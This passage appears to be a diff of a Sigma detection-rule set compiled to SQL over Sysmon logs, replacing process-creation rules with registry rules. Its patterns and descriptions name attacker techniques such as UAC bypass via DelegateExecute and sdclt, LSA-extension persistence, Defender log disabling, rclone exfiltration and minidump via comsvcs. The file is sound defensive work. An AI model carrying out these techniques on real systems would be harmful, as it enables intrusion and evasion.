ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND Details = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE 